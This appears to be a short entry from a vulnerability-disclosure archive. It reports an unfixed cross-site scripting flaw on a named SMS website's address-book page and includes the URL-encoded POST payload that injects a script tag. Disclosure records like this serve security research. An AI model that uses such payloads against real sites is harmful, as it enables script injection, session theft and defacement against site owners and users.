Security researcher Uber0n submitted on 10/08/2008 a cross-site scripting (XSS) vulnerability affecting www.freebiesms.co.uk, which at the time of submission ranked 145968 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 10/08/2008
Date published: 17/06/2009
Status: UNFIXED
Author: Uber0n
Domain: www.freebiesms.co.uk
Category: XSS
Pagerank: 145968
URL: http://www.freebiesms.co.uk/addToAddressBook.aspx
POST: __VIEWSTATE=[ViewState value omitted]&Name1=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&No1=&Email1=&Name2=&No2=&Email2=&Name3=&No3=&Email3=